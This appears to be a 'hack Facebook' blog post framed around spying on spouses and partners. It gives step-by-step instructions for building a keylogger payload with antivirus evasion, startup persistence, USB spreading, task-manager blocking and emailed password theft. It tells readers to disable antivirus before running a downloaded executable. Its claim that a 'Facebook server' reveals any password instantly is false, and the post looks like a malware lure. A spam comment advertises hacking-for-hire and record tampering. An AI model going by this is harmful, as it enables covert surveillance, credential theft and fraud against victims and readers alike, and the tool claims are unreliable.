​How to Hack Facebook Password With Ethical Hacking Method + Tool [Leaked]

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Hello Everyone,
We get thousand's of emails everyday most of them asking us "How to Hack my Girlfriend/Wife/Husband Facebook account ?". You as a reader you are here because you want to hack someone's Facebook account. in our last post we have explained 3 successful ways to Hack Facebook account password, where we have discussed the Second best working method which is used by most of the Hackers is using Keyloggers

In this post, we are going to reveal the second method that generally hackers use
for hacking Facebook passwords most of the hackers use the latest advanced technology Keylogger to get remote delivery of password because even a person with a good knowledge of computer's can fall for it.

Here are step by step instructions on how to Hack Facebook account with a Keylogger tool and get Instant Password.

 Follow these steps to Hack Facebook Account with Keylogger

[Note: In order to run this program please turn off your antivirus temporarily]

[Note: This is for Educational Purposes only. I and Facebook Ninja is not responsible for any misuse of knowledge.] 

FOR LATEST 2017 FACEBOOK HACKS VISIT OUR FACEBOOK PAGE https://www.facebook.com/FB-Hackers-933034096734371/

Step #1: 

Download SpyKing keylogger  because of it Amazing Features and it is the Leading keylogger in the Market also used by 99% of Hackers around the World because of its latest advanced logging technology and remote delivery of Logs via Email.

Step #2: 

[Note : In order to Run the Keylogger program Please Turn off your Antivirus Temporarily, if you have another Keylogger running you might need to disable]

Open the Spyking installation file that you just downloaded and it will start the installation process.

Install SpykingV2.exe

Step #3:

After Installing  SpykingV2.exe

You see Login Panel like this

Use my Access Key to Login or Get your Own Access Key Here 

Key: AE33-GEDF-9847-OLJH  

After Logging into Login Panel You see something like this

  Fill the above respective fields carefully by following below steps.

Step #4: Building Keylogger Server

  • Gmail Username and Password :

          Enter email/password in which you want to receive Facebook passwords. 

  • Server Name :
          Choose a name for Spyking778.exe  file. 

  • Interval :

          Choose how often you want to be emailed passwords in hours.

  • Anti's :
          Select this it helps to protect sever from Anti-virus Programs.
  • Add to Startup :
          Select this  it runs every time the victims computer starts up. 
  • USB Spread :

          Select this Check box it Enables Server to be launched from a USB.

  • Delete Cookies :
          Select this makes victim to enter all their saved passwords again. 

  • Kill Task-Manager :

          Select this it won't allow victim to remove server from the task manager. 

  • Icon Changer :
          Don't select any Icon.

  • Fake Error Message :

          Enter a Error Message you want to Post on Victim's Facebook Wall. 

          Enter a Post like "You have Been Hacked".

          Enter a Error Message and Scare your Victim.

Step #5: 

After Filling the above fields Click on Build Keylogger to Connect Facebook Server.

           (Make sure you Internet connection is active. )


 After Successfully Connecting to SpyKing Facebook Server. 

Step #6 :

You see something like this 

Now you are connected to Facebook Secured Server 

* Enter Victims Email or Profile ID.
* Click on Hack to get the Password.

You can also See the Victims Password Instantly.

* All passwords are sent to email which you have entered before in Server details.

With this Facebook Server you can hack any Facebook account. I hold no responsibility or liability for what you may, or may not choose to do with this tool. This tool was built and is intended for educational purposes only.

Step #7:

Passwords are sent to email 

If you have any Questions or Comments, let me know.


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  2. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com



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